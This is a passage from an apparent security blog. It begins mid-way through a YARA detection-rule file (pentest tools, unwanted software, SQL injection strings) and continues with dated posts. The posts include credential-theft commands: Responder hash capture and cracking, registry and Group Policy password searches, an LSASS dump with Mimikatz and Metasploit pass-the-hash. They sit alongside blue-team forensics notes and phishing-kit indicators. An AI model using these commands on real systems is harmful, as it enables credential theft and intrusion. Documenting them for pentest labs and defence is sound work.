 $string14 = "/deftlinux/" nocase
 $string15 = "deftlinux-" nocase
 $string16 = "parrotsec." nocase
 $string17 = "/parrotsec/" nocase
 $string18 = "parrotsec-" nocase
 $string19 = "altlinux./altlinux/" nocase
 $string20 = "altlinux-" nocase
 $string21 = "digi77." nocase
 $string22 = "/digi77/" nocase
 $string23 = "digi77-" nocase
 $string24 = ".paterva." nocase
 $string25 = "portswigger." nocase
 $string26 = "exploit-db." nocase
 $string27 = "/exploit-db/" nocase
 $string28 = "exploit-db-" nocase
 $string29 = "parrot.sh" nocase
 $string30 = "/parrot.sh/" nocase
 $string31 = "basealt.ru" nocase
 $string32 = "/basealt.ru/" nocase
 $string33 = "basealt.ru-" nocase
 $string34 = "0day.today" nocase
 $string35 = "/0day.today/" nocase
 $string36 = "0day.today-archstrike." nocase
 $string37 = "/archstrike/" nocase
 $string38 = "archstrike-" nocase
condition:
 1 of them
}

rule PUPSoftware
{
meta:
 author = "@neonprimetime"
 description = "Potentially Unwanted Software"
strings:
 $string0 = "adusetup" nocase
 $string1 = "advanced driver" nocase
 $string2 = "anytimeastrology" nocase
 $string3 = "aplusgamer" nocase
 $string4 = "apnsetup" nocase
 $string5 = "apnstub" nocase
 $string6 = "ascsetup" nocase
 $string7 = "astromenda" nocase
 $string8 = "atozmanuals" nocase
 $string9 = "atwrun" nocase
 $string10 = "audiotoaudio" nocase
 $string11 = "bringmesports" nocase
 $string12 = "bytefence" nocase
 $string13 = "calendarspark" nocase
 $string14 = "ccleaner" nocase
 $string15 = "citysearch" nocase
 $string16 = "convertpdfsnowtooltab" nocase
 $string17 = "coupon companion" nocase
 $string18 = "couponscom" nocase
 $string19 = "cursormania" nocase
 $string20 = "dailybibleguide" nocase
 $string21 = "dailyrecipeguidetooltab" nocase
 $string22 = "dailywellnessguide" nocase
 $string23 = "dictionaryboss" nocase
 $string24 = "directionsandmap" nocase
 $string25 = "discoverancestry" nocase
 $string26 = "discoverliveradio" nocase
 $string27 = "disk-defrag-setup" nocase
 $string28 = "downspeedtest" nocase
 $string29 = "driver-updater-setup" nocase
 $string30 = "driver.talent" nocase
 $string31 = "driverassist-setup" nocase
 $string32 = "driverdoc" nocase
 $string33 = "drivereasy" nocase
 $string34 = "driverrestore" nocase
 $string35 = "driversupport" nocase
 $string36 = "drivertalent" nocase
 $string37 = "drivertoolkit" nocase
 $string38 = "driverupdate-" nocase
 $string39 = "driverupdate-downloader" nocase
 $string40 = "driverupdate-setup" nocase
 $string41 = "driverwhiz" nocase
 $string42 = "easeware" nocase
 $string43 = "easydriverpro" nocase
 $string44 = "easyhomedecorating" nocase
 $string45 = "easypdfcombine" nocase
 $string46 = "easyphotoedit" nocase
 $string47 = "eliteunzip" nocase
 $string48 = "emailaccessonline" nocase
 $string49 = "everyday lookup" nocase
 $string50 = "everydaylookup" nocase
 $string51 = "filefanatic" nocase
 $string52 = "filesharefanatic" nocase
 $string53 = "flashplayerpro" nocase
 $string54 = "flightsearchapp" nocase
 $string55 = "freemakevideoconvertersetup" nocase
 $string56 = "freemanuals" nocase
 $string57 = "freeradiocast" nocase
 $string58 = "fromdoctopdftooltab" nocase
 $string59 = "funcustomcreations" nocase
 $string60 = "gamingassassin" nocase
 $string61 = "gamingwonderland" nocase
 $string62 = "garden enthusiast" nocase
 $string63 = "gardeningenthusiast" nocase
 $string64 = "getflightinfo" nocase
 $string65 = "getformsonline" nocase
 $string66 = "gettvstreamnow" nocase
 $string67 = "gifables" nocase
 $string68 = "happinessinfusion" nocase
 $string69 = "headlinealley" nocase
 $string70 = "howtosimplified" nocase
 $string71 = "howtosuite" nocase
 $string72 = "inboxace" nocase
 $string73 = "internetspeedtracker" nocase
 $string74 = "knowthebible" nocase
 $string75 = "localcrimewatcher" nocase
 $string76 = "mapsgalaxy" nocase
 $string77 = "marineaquariumlite" nocase
 $string78 = "mergedocsonline" nocase
 $string79 = "mydailyrunway" nocase
 $string80 = "myeasylotto" nocase
 $string81 = "myformsfinder" nocase
 $string82 = "myfuncards" nocase
 $string83 = "mynewsguide" nocase
 $string84 = "mypcbackup" nocase
 $string85 = "myradioplayer" nocase
 $string86 = "myscrapnook" nocase
 $string87 = "mysocialshortcut" nocase
 $string88 = "mytelevisionhq" nocase
 $string89 = "mytransitguide" nocase
 $string90 = "myweatherradar" nocase
 $string91 = "mywebface" nocase
 $string92 = "notehomepage" nocase
 $string93 = "onlinemapfinder" nocase
 $string94 = "openfreely" nocase
 $string95 = "packagetracer" nocase
 $string96 = "pckeeper" nocase
 $string97 = "pdfconverterhq" nocase
 $string98 = "photofriendzy" nocase
 $string99 = "playpoptrivia" nocase
 $string100 = "playthruplayer" nocase
 $string101 = "popularscreensavers" nocase
 $string102 = "ppc-software" nocase
 $string103 = "premierdownloadmanager" nocase
 $string104 = "procleaningsoftware" nocase
 $string105 = "productivityboss" nocase
 $string106 = "productmanualsfinder" nocase
 $string107 = "propccleaner" nocase
 $string108 = "puzzlegamesdaily" nocase
 $string109 = "quotationcafe" nocase
 $string110 = "qyuninst" nocase
 $string111 = "radiorage" nocase
 $string112 = "readingfanatic" nocase
 $string113 = "registry-cleaner" nocase
 $string114 = "regservo" nocase
 $string115 = "removedt" nocase
 $string116 = "safepcrepair" nocase
 $string117 = "scenichomepage" nocase
 $string118 = "searchbar" nocase
 $string119 = "searchformsonline" nocase
 $string120 = "searchpredict" nocase
 $string121 = "slimcleanerplus" nocase
 $string122 = "smsfrombrowser" nocase
 $string123 = "snapmyscreen" nocase
 $string124 = "soccerinferno" nocase
 $string125 = "spyhunter" nocase
 $string126 = "studyhq" nocase
 $string127 = "sweepstakesalley" nocase
 $string128 = "tbieaddin.dll" nocase
 $string129 = "televisionfanatic" nocase
 $string130 = "ticketxplorer" nocase
 $string131 = "timewhackers" nocase
 $string132 = "tooltabextension.dll" nocase
 $string133 = "totalrecipesearch" nocase
 $string134 = "trackapackage" nocase
 $string135 = "translationbuddy" nocase
 $string136 = "unifiedlogger.dll" nocase
 $string137 = "utility chest" nocase
 $string138 = "videodownloadconverter" nocase
 $string139 = "votinstw" nocase
 $string140 = "votprx" nocase
 $string141 = "wb-setup" nocase
 $string142 = "web_bar" nocase
 $string143 = "webdiscover" nocase
 $string144 = "webdiscoverbrowserdownloaderwebesc" nocase
 $string145 = "webext_dl" nocase
 $string146 = "winwb" nocase
 $string147 = "yourtemplatefindertooltab" nocase
 $string148 = "ysearchsettool" nocase
 $string149 = "ysearchutilsvc" nocase
condition:
 1 of them
}


rule ActiveDirectoryDomainFlag
{
meta:
 author = "@neonprimetime"
 description = "AD domain flag"
strings:
 $string0 = " /domain " nocase
condition:
 1 of them
}

rule ActiveDirectoryCreateFlag
{
meta:
 author = "@neonprimetime"
 description = "AD Create flag"
strings:
 $string0 = " /add " nocase
 $string1 = " /create " nocase
condition:
 1 of them
}

rule MetasploitPort
{
meta:
 author = "@neonprimetime"
 description = "Metasploit Port"
strings:
 $string0 = ":4444" nocase
condition:
 1 of them
}

rule AdminFileShareAccess
{
meta:
 author = "@neonprimetime"
 description = "Admin File Share Access"
strings:
 $string0 = "admin$" nocase
condition:
 1 of them
}

rule TeamViewerPort
{
meta:
 author = "@neonprimetime"
 description = "TeamViewer Port"
strings:
 $string0 = ":5938" nocase
condition:
 1 of them
}

rule ActiveDirectoryCriticalGroup
{
meta:
 author = "@neonprimetime"
 description = "Critical AD groups"
strings:
 $string0 = "domain admins" nocase
 $string1 = "enterprise admins" nocase
 $string2 = "schema admins" nocase
 $string3 = "workstation admins" nocase
 $string4 = "dns admins" nocase
 $string5 = "server admins" nocase
condition:
 1 of them
}

rule NewUser
{
meta:
 author = "@neonprimetime"
 description = "New User Commands"
strings:
 $string0 = "new-localuser" nocase
 $string1 = "new-aduser" nocase
condition:
 1 of them
}

rule WebDownloader
{
meta:
 author = "@neonprimetime"
 description = "Web Downloader"
strings:
 $string0 = "DownloadFile(" nocase
 $string1 = "DownloadString" nocase
 $string2 = "WebRequest" nocase
 $string3 = "wget" nocase
 $string4 = "bitstransfer" nocase
condition:
 1 of them
}

rule McAfeeQuarantineFile
{
meta:
 author = "@neonprimetime"
 description = "McAfee Quarantine File"
strings:
 $string0 = "\\quarantine\\" nocase
 $string1 = ".bup" nocase
condition:
 1 of them
}


rule VulnerabilityScanner
{
meta:
 author = "@neonprimetime"
 description = "Vulnerability Scanner"
strings:
 $string0 = "AngryIP" nocase
 $string1a = "\\Nmap " nocase
 $string1b = "/Nmap." nocase
 $string1c = " Nmap " nocase
 $string1d = " Nmap." nocase
 $string2 = "Nessus" nocase
 $string3 = "sqlmap" nocase
 $string4 = "nikto" nocase
 $string5 = "wpscan" nocase
 $string6 = "hyrda" nocase
 $string7 = "dirbuster" nocase
 $string8 = "masscan" nocase
 $string9 = "morfeus" nocase
 $string10 = "sqlninja" nocase
condition:
 1 of them
}

rule SqlInjection
{
meta:
 author = "@neonprimetime"
 description = "Sql Injection"
strings:
 $string0 = "UNION+ALL+SELECT" nocase
 $string1 = ",NULL,NULL" nocase
 $string2 = "AND+SLEEP" nocase
 $string3 = "PG_SLEEP" nocase
 $string4 = "WAITFOR+DELAY" nocase
 $string5 = "CONCAT(0x" nocase
 $string6 = "UNION+SELECT" nocase
 $string7 = "--+" nocase
 $string8 = "')UNION ALL SELECT" nocase
 $string9 = ",NULL,NULL" nocase
 $string10 = "AND SLEEP" nocase
 $string11 = "WAITFOR DELAY" nocase
 $string12 = "CONTACT(0x" nocase
 $string13 = "UNION SELECT" nocase
 $string14 = "UNION+ALL+SELECT" nocase
 $string15 = "AND+SLEEP" nocase
 $string16 = "WAITFOR+DELAY" nocase
 $string17 = "UNION+SELECT)" nocase
condition:
 1 of them
}

Monday, November 25, 2019

kali update apt-get upgrade

apt-get update (gets the sources lists for packages)
apt-get upgrade (upgrade tools)
apt-get dist-upgrade (entire kali rolling)
apt-get autoremove (removes dependencies no longer needed)

Wednesday, November 6, 2019

Python IoT search with Wget and Yara Rules

# Given a list of urls, determine what type of IoT device (or any device for that matter) they are based on you plugging in Yara rules into the .yar files

import os
import subprocess
import traceback

debug = "false"
skipDownload = "false"
input = "urls.txt"
yaraSpecificRuleFile = "IoTSpecific.yar"
yaraGenericRuleFile = "IoTGeneric.yar"
wgetParams = "--quiet --no-check-certificate --timeout=2 --tries=3"
yaraParams = ""
outputExt = ".html"
urls = open(input, "r")

if skipDownload == "false":
 for url in urls:
  url = url.rstrip()
  cleanurl = url.rstrip().replace('/','_').replace('\\','_').replace(':','_').replace('.','_').replace('&','_').replace('?','_').replace('=','_').replace('%','_') + outputExt
  wgetCommand = ("wget %s --output-document=%s %s 2>/dev/null" % (wgetParams, cleanurl, url))
  if(debug == "true"):
   print(("DEBUG,Starting Download of '%s' to '%s'" % (url, cleanurl)))
  try:
   output = subprocess.check_output(wgetCommand, shell=True)
   if "error" in output:
    print(("ERROR,Unable to download '%s' error '%s'" % (wgetCommand, output)))
  except Exception:
   print(("ERROR,Unable to download '%s' error '%s'" % (wgetCommand,traceback.print_exc())))
  if(debug == "true"):
   print(("DEBUG,Finished Download of '%s' to '%s'" % (url, cleanurl)))

for htmlfile in os.listdir('.'):
 if htmlfile.endswith(".html"):
  if os.stat(htmlfile).st_size == 0:
   print(("NoResponse,%s" % (htmlfile)))
  else:
   yaraCommand = ("yara %s %s %s" % (yaraParams, yaraSpecificRuleFile, htmlfile))
   if(debug == "true"):
    print(("DEBUG,Starting Scanning: '%s'" % (htmlfile)))
   try:
    output = subprocess.check_output(yaraCommand, shell=True)
    if "error" in output:
     print(("ERROR,Unable to Scan '%s' error '%s'" % (yaraCommand, output)))
    if output:
     output = output.rstrip()
     print(output.replace(" ",","))
    else:
     yaraRescanCommand = ("yara %s %s %s" % (yaraParams, yaraGenericRuleFile, htmlfile))
     if(debug == "true"):
      print(("DEBUG,Starting ReScanning: '%s'" % (htmlfile)))
     try:
      output = subprocess.check_output(yaraRescanCommand, shell=True)
      if "error" in output:
       print(("ERROR,Unable to ReScan '%s' error '%s'" % (yaraCommand, output)))
      if output:
       output = output.rstrip()
       print(output.replace(" ",","))
      else:
       print(("NoMatch,%s" % (htmlfile)))
     except Exception:
      print(("ERROR,Unable to ReScan '%s' error '%s'" % (yaraCommand,traceback.print_exc())))
     if(debug == "true"):
      print(("DEBUG,Finished ReScanning: '%s'" % (htmlfile)))
   except Exception:
    print(("ERROR,Unable to Scan '%s' error '%s'" % (yaraCommand,traceback.print_exc())))
   if(debug == "true"):
    print(("DEBUG,Finished Scanning: '%s'" % (htmlfile)))

urls.close()

Thursday, October 31, 2019

Nmap Open Web Ports to CSV

nmap scan web ports (80,443,8080,8443) and output to csv using sed

nmap -T4 --max-rtt-timeout 200ms --initial-rtt-timeout 150ms --min-hostgroup 512 -Pn -p 80,443,8080,8443 10.99.106.0/24 -oG - | egrep -v "^#|Status: Up" | sed -E 's/Host\:\s([^\s]+)\s[(]([^)]*)[)]\s+Ports[:]\s80\/([^/]+)\/.+443\/([^/]+)\/.+8080\/([^/]+)\/.+8443\/([^/]+)\/.*/\1,\2,\3,\4,\5,\6/' | grep open



example:

10.99.106.10,test1.local.com,open,closed,closed,closed
10.99.106.11,,open,open,closed,closed
10.99.106.12,,open,open,closed,closed
10.99.106.76,test2.local.com,closed,open,closed,closed

Tuesday, October 22, 2019

Sample Responder command

responder -I eth0 -r -b

cd /usr/share/responder/logs

john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt

john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt

Friday, October 18, 2019

Print all Mac Address Vendors around you (Arp -a)

# print all mac address vendors around you (using arp table and this great python library https://pypi.org/project/mac-vendor-lookup/ )

import os
from mac_vendor_lookup import MacLookup

myCmd = os.popen("arp -a").read()
print(myCmd)
for line in myCmd.splitlines():
 for item in line.split():
  if "-" in item:
   if "--" not in item:
    try:
     print(item + ": " + MacLookup().lookup(item))
    except:
     print(item + ": not found")

View Stored Credentials and Runas

>cmdkey /list

Currently stored credentials:

....

runas /savecred /user:XXXX "c:\BAD.exe"

Search inside Windows Files for passwords

>findstr /s password c:\*.ps1

Password Searching in Registry

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S

REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S


Get File Shares Exposed "net share"

>net share

Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\                             Default share
IPC$                                         Remote IPC
print$       C:\WINDOWS\system32\spool\drivers                                             Printer Drivers
ADMIN$       C:\WINDOWS                      Remote Admin

Password Login Settings "net accounts"

>net accounts
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          30
Minimum password length:                              15
Length of password history maintained:                12
Lockout threshold:                                    3
Lockout duration (minutes):                           45
Lockout observation window (minutes):                 45
Computer role:                                        WORKSTATION

Get File Shares Drive Letters wmic logicaldisk

>wmic logicaldisk get caption, description, providername
Caption  Description         ProviderName
C:       Local Fixed Disk
X:       Network Connection  \\server\user\XXX
Y:       Network Connection  \\server\public

Print all environment variables "set"

>set

ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\XXXX\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=PCNAME
ComSpec=C:\WINDOWS\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default

Patches Installed wmic qfe

>wmic qfe

Caption                                     CSName       Description      FixComments  HotFixID   InstallDate  InstalledBy          InstalledOn  Name  ServicePackInEffect  Status
http://support.microsoft.com/?kbid=4514366  PCNAME Update                        KB4514366               NT AUTHORITY\SYSTEM  XX/XX/XXXX
http://support.microsoft.com/?kbid=4515855  PCNAME  Update                        KB4515855
http://support.microsoft.com/?kbid=4465065  PCNAME  Update                        KB4465065               NT AUTHORITY\SYSTEM  XX/XX/XXXX
http://support.microsoft.com/?kbid=4470788  PCNAME  Security Update               KB4470788                                    XX/XX/XXXX
http://support.microsoft.com/?kbid=4489907  PCNAME  Security Update               KB4489907                                    XX/XX/XXXX
http://support.microsoft.com/?kbid=4503308  PCNAME  Security Update               KB4503308               NT AUTHORITY\SYSTEM  XX/XX/XXXX

Windows Systeminfo

>systeminfo | findstr /C:"OS Name" /C:"OS Version"

OS Name:                   Microsoft Windows 10
OS Version:                10.0.XXX N/A Build XXXX
BIOS Version:              Dell Inc. 1.XX, XX/XX/XXX

Tuesday, October 15, 2019

Powershell listening on a port

$socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080);
if($socket -eq $null){
exit 1;
}
$socket.start();
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;

try
{
    do
    {
    $read = $null;
    while($stream.DataAvailable -or $read -eq $null) {
    $read = $stream.Read($buffer, 0, 2048);
    if ($read -gt 0) {
                    $data = [System.Text.Encoding]::ASCII.GetString($buffer).Trim(0x00).TrimEnd()
                    $buffer.Clear()
                    if($data -ne $null -and $data .Length -gt 0){
                        Write-Output ("RECEIVED : [{0}]" -f $data)
                        $sendBack = new-object System.Byte[] 2048;
                        $sendBack = [System.Text.Encoding]::UTF8.GetBytes($data)
                        $stream.Write($sendBack, 0, $results.Length)
                        $sendBack.Clear()
                        Write-Output ("SENT BACK: [{0}]" -f $data)
                            }
    }
    }
    } While ($read -gt 0);
}
finally
{
    $fileStream.Close();
    $socket.Stop();
    $client.close();
    $stream.Dispose();
}

Wednesday, October 2, 2019

Lsass Dump Mimikatz Pass the Hash Basics

procdump -ma lsass.exe {path to where you want it dumped}\lsass.dmp

Mimikatz.exe
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonPasswords

Username : {user}
Domain     : {domain}
NTLM       : {NTLM Hash}

use auxillary/scanner/smb/smb_login
set SMBDomain {domain}
set SMBUser {user}
set RHOSTS {ip addr}
set SMBPass aad3b435b51404eeaad3b435b51404ee:{NTLM Hash}
run




good blog

https://blog.ropnop.com/practical-usage-of-ntlm-hashes/

When you can & cannot Pass the Hash

great blog

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

From a pentesting perspective:
  • You CAN perform Pass-The-Hash attacks with NTLM hashes.
  • You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.
You get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller's NTDS.dit database or from Mimikatz (Fun fact, although you can't get clear-text passwords from Mimikatz on Windows >= 8.1 you can get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that's perfectly fine: obviously you can still Pass-The-Hash with just the NT hash.
You get Net-NTLMv1/v2 (a.k.a NTLMv1/v2) hashes when using tools like Responder or Inveigh.

Wednesday, September 25, 2019

find admin pages

Kali -> Applications -> 03 Web Application Analysis -> Web Vulnerabilty Scanners -> jSQL Injection -> Admin page -> Find admin page(s)



Thursday, May 16, 2019

Find Group Policy Passwords

simple windows command to find group policy passwords in xml

findstr /SI cpassword \\DC\sysvol\DOMAIN\Policies\*.xml


e.g. Groups.xml contains cpassword

Friday, May 10, 2019

New PhishingKitTracker Blog

Just a heads up I'm moving all my PhishingKitTracker blog posts ( @PhishKitTracker - https://github.com/neonprimetime/PhishingKitTracker ) over to this new blog url

https://phishingkittracker.blogspot.com/

This blog ( @neonprimetime ) will continue to be for #malware and other #infosec topics

Tuesday, May 7, 2019

IzLaden - Phishing Kit Author

#izladen #phishingkit author
#threatactoremail izladen-Free-Tools@hotmail.com

---- | ★ ★ ★ IzlAden BenGazi FREE TOOLS ★ ★ ★ | ---- 
|----------| IzlAden BenGazi V3 TEXT RESULT |--------------|
Coded By IzlAden BenGazi ===> 2016 / 2017

227ce240dff32a0a35810b0040539ae2
https://www.virustotal.com/#/file/735a16f31af8159af71c40738a22c5638d41bd58144014b9a3fee00390a1da6b/details

a9fd8300c7a5654f1ee9247ebdb3e42a
https://www.virustotal.com/#/file/7434db52972fd2aa7f253bded2efff92f6069fd9e8ff7beb27c5d998ce803c41/detection

c37d8e468a67748c7f9687ecfe39c960
https://www.virustotal.com/#/file/4e1ce76c96c3163d1da5060157b4c0924647e4938843f827f36380837bb7610e/detection





FudPages - Phishing Kit Author

#fudpages #phishingkit author
#threatactoremail fudpages@gmail.com

---------------Created BY fudpages(doit)com-------------
---------------Created BY fudpages-------------
----------- FUDPAGES [.] RU --------------

abc845784335374ecb86cc7d9f105ba7
https://www.virustotal.com/#/file/3e76cff314a6b4fef91784f8fab3f21e985f68bd9aa909cdca0245611a3f8757/detection

070a0ebacac551e86ed00e1118f9a969
https://www.virustotal.com/#/file/bcb77cbee636b93320b7f2bcd302e57f32bdc3a8ad34beb95c5e74a3a6d3dc63/detection

69b3f69e5a2b02338fe6577c62d7bf2e
https://www.virustotal.com/#/file/c40dc9c4da50c7bbe85c0c88cc2ee2b98ff44104d1bea87ad01fceb1e485b6cc/detection




Blackshop Tools - Phishing Kit Author

#BlackshopTools #phishingkit author
#threatactoremail 
blackshop.tools@gmail.com skype blackshop tools ICQ 657940639 sell all Spamming & Hacking tools ---------------Created By blackshop.tools------------------------------ 3b2d31dcd6e2e22af611856644d26e21 https://www.virustotal.com/#/file/fa8cf9cb97931eabd0f10cf3dbe8d8820ffa254df7239ce988d6daba4f91cbe3/detection b9b61c8c84c51c292f4800afef8f56d1 https://www.virustotal.com/#/file/463819bd958981039ed47b6cd7efadb516837f19178bb284c0b5124f6cfb572d/detection dc95ec1097920f11590d8aa9ecea50e6 https://www.virustotal.com/#/file/bf4c4aa938d795d011c5e68261f1edc5a79b2c710175b1bb71426ef12910de27/detection 2749a88067675d74bbf01b7776332082 https://www.virustotal.com/#/file/30e67f21d143ddae4af315daca8745ab7fcf2f08fa73326f42b620728e375de1/detection 0e489a50c0be2b93940f835bb6301736 https://www.virustotal.com/#/file/a5f191da51b09b982412490a1f4bfbe64a491a70c90c3fc4f3f3ee4b51abb697/detection 39ddb4f240c0e837b738f5d7f26ea5b1 https://www.virustotal.com/#/file/da51cb87c17a80201738c76fd51d725ebd5d2035230e9be97615bc9003fbad98/detection


CAZANOVA163 - Phishing Kit Author

#CAZANOVA163 #phishingkit author
#threatactoremail 

CAZANOVA163-Tools@hotmail.com CAZANOVA163-Free-Tools@hotmail.com a357bcfb2779420c95b5a4a2700ab30a https://www.virustotal.com/#/file/5e7c567e561a59f93db854ac91cd7f933fa1dac2622e9a05906964c9e03935fb/details 63f73f4bc9fc243cb919708286c700d8 https://www.virustotal.com/#/file/06be80d28dd6a0cf906b0e7a24054dce23f0a62c982a1eacb83ffbe7073f8dba/details $headers = "From: CAZANOVA163 <CAZANOVA163-Tools@hotmail.com>\r\n"; $headers = "From: CAZANOVA163 <CAZANOVA163-Free-Tools@hotmail.com>\r\n"; <meta name="description" content="xPayPal_2017 v1.1 | Coded By CaZaNoVa163"> <meta name="author" content="CaZaNoVa163">

Anonisma - Phishing Kit Author

#threatactoremail #phishing #phishingkit
Anonisma-Free-Tools@hotmail.com

https://www.virustotal.com/#/file/801806d0cdedfd1ab66ef5b11499df78dcff82c642704bd9d9748c62ccc676d6/detection
https://www.virustotal.com/#/file/3c590a371b79c940d76a3c3a24ccda3a93334ba618d2d2473e61053da349a072/detection
https://www.virustotal.com/#/file/a4d0f7d275d0b04b8b3ff80a58a24991dfd9800d3972027a8dbde6582cb185f5/detection

 // Coded By Anonisma ===> 2016 / 2017  
 include "./includes/lang".$_SESSION['ANONISMA-AYOUB'];
           ---- | ★ ★ ★ ANONISMA FREE TOOLS ★ ★ ★ | ---- 
 $headers = "From: ANONISMA SMART <Anonisma-Free-Tools@hotmail.com>\r\n";
 $text_result_anon .= "|----------| ANONISMA MA DZ TN V3 TEXT RESULT |--------------|\n";
    $_SESSION['ANONISMA-AYOUB']="/fr.php";
    $_SESSION['ANONISMA-AYOUB']="/es.php";
   $_SESSION['ANONISMA-AYOUB']="/it.php";
    $_SESSION['ANONISMA-AYOUB']="/ru.php";
    $_SESSION['ANONISMA-AYOUB']="/pt.php";
    $_SESSION['ANONISMA-AYOUB']="/tr.php";
    $_SESSION['ANONISMA-AYOUB']="/pl.php";
    $_SESSION['ANONISMA-AYOUB']="/no.php";
    $_SESSION['ANONISMA-AYOUB']="/nl.php";
    $_SESSION['ANONISMA-AYOUB']="/de.php";
   $_SESSION['ANONISMA-AYOUB']="/en.php";





Friday, May 3, 2019

Wireshark Fix for Error No Protocol Specified

Working through a pen testing lab, was getting access denied when trying to capture.
Tried running sudo and it doesn't let you cause it's a security risk.
But when we're in a pen test lab, i'm ok with that risk.
But I was still getting this error "no protocol specified"

> sudo wireshark
No protocol specified
(wireshark:3962): Gtk-WARNING **: cannot open display: :0.0

The fix I found

> export XAUTHORITY=/home/mooreted/.Xauthority 
> sudo wireshark

Wednesday, May 1, 2019

Registry Explorer basic usage

Open up a registry hive such as

c:\windows\system32\config\SOFTWARE

with Registry Explorer from Eric Zimmerman

https://ericzimmerman.github.io/#!index.md

to view registry contents


Date Time Conversions with DCode


If you have a date/time in numerical format such as in the registry

SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate

1510798682

Use the software DCode with the format: "Unix:Numeric Value" to get the actual date 11/16/2017


https://www.digital-detective.net/dcode/

Thursday, March 14, 2019

python syslog script

useful python syslog i found online
https://github.com/cloudpassage/splunk-halo-python/blob/master/remote_syslog.py

sample usage

syslog('Apr 23 07:36:52 10.2.108.181 EventName=[], SourceIP=[], SourcePort=[], DestinationIP=[], DestinationPort=[], UserName=[], SourceWorkstation=[], Url=[], FilePath=[], MD5=[], LogSource=[], MacAddress=[], LogSourceTime=[], Notes=[]', host='10.xx.xx.xx', facility=FACILITY['local0'], level=LEVEL['info'])

---------------

#!/usr/bin/python

"""
Python syslog client.

This code is placed in the public domain by the author.
Written by Christian Stigen Larsen.

This is especially neat for Windows users, who (I think) don't
get any syslog module in the default python installation.

See RFC3164 for more info -- http://tools.ietf.org/html/rfc3164

Note that if you intend to send messages to remote servers, their
syslogd must be started with -r to allow to receive UDP from
the network.
"""

import socket

# I'm a python novice, so I don't know of better ways to define enums

FACILITY = {
'kern': 0, 'user': 1, 'mail': 2, 'daemon': 3,
'auth': 4, 'syslog': 5, 'lpr': 6, 'news': 7,
'uucp': 8, 'cron': 9, 'authpriv': 10, 'ftp': 11,
'local0': 16, 'local1': 17, 'local2': 18, 'local3': 19,
'local4': 20, 'local5': 21, 'local6': 22, 'local7': 23,
}

LEVEL = {
'emerg': 0, 'alert':1, 'crit': 2, 'err': 3,
'warning': 4, 'notice': 5, 'info': 6, 'debug': 7
}

def syslog(message, level=LEVEL['notice'], facility=FACILITY['daemon'],
host='localhost', port=514):

"""
Send syslog UDP packet to given host and port.
"""

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
data = '<%d>%s' % (level + facility*8, message)
sock.sendto(data, (host, port))
sock.close()

Friday, March 1, 2019

View Chrome Download and Url History Basics 101

download sqlite browser portable

https://sqlitebrowser.org/dl/

copy "history" database from chrome appdata

%appdata%\local\google\chrome\user data\default\history

"open database", select it

look at the 2 tables
- downloads
- urls

Thursday, February 28, 2019

simple python script to search ips, hostnames, or domains for page titles of websites

# simple python script to search ips, hostnames, or domains for page titles
import argparse
from urllib.request import urlopen
from urllib.request import urlretrieve
import re
import sys
import os

#arguments
arguments = argparse.ArgumentParser("Search for websites, pass 1 file of hostnames, ips, or domains")
arguments.add_argument("-f", "--filepath", type=str, required=True, help="Path to list of hostnames, ips, or domains 1 per line")
settings = arguments.parse_args()
filepath = settings.filepath

with open(filepath) as fp:
 theurl = fp.readline()
 while theurl:
  try:
   theurl = 'http://' + theurl.strip()
   html = urlopen(theurl, timeout=2)
   val = html.read()
   titles = re.findall(r'(?i)<title>(.*?)</title>',str(val))
   if len(titles) > 0:
    print("found '{0}' at '{1}'".format(titles[0], theurl))
   theurl = 'https://' + theurl.strip()
   html = urlopen(theurl, timeout=3)
   val = html.read()
   titles = re.findall(r'(?i)<title>(.*?)</title>',str(val))
   if len(titles) > 0:
    print("found '{0}' at '{1}'".format(titles[0], theurl))
  except Exception as e:
   moveon = 1
   #print("failed '{0}' with '{1}'".format(theurl, str(e)))
  theurl = fp.readline()

Wednesday, February 20, 2019

Windows Process Tree Basics (Blue Team)

Great read by Pete here

https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2

Just jotting some notes for myself below

SYSTEM
SYSTEM IDLE Process
- no visible parent
- should only ever be 1 of each
- in kernel mode ( created by NT OS Kernel )
- SYSTEM always has PID 4
- SYSTEM IDLE Process always has 1 threat per CPU

SMSS.EXE
- parent is SYSTEM (PID 4)
- should only ever be 1 running
- runs from \system32\smss.exe
- 1st user mode process started by Kernel
- launches WINLOGON.EXE, WININIT.EXE, and CSRSS.EXE , then SMSS.EXE exits

WINLOGON.EXE
- no parent (because SMSS.EXE launches it and then SMSS.EXE exits)
- runs as NT AUTHORITY\SYSTEM
- runs from \system32\winlogon.exe
- may spawn child processes (alternate login devices such as biometric readers)
- launches USERINIT.EXE which runs logon scripts, connects to network, starts EXPLORER.EXE

WININIT.EXE
- no parent (because SMSS.EXE launches it and then SMSS.EXE exits)
- runs as NT AUTHORITY\SYSTEM
- runs from system32\wininit.exe
- launches SERVICES.EXE, LSASS.EXE, and LSM.EXE
- creates %windir%\temp

CSRSS.EXE
- no parent (because SMSS.EXE launches it and then SMSS.EXE exits)
- runs as NT AUTHORITY\SYSTEM
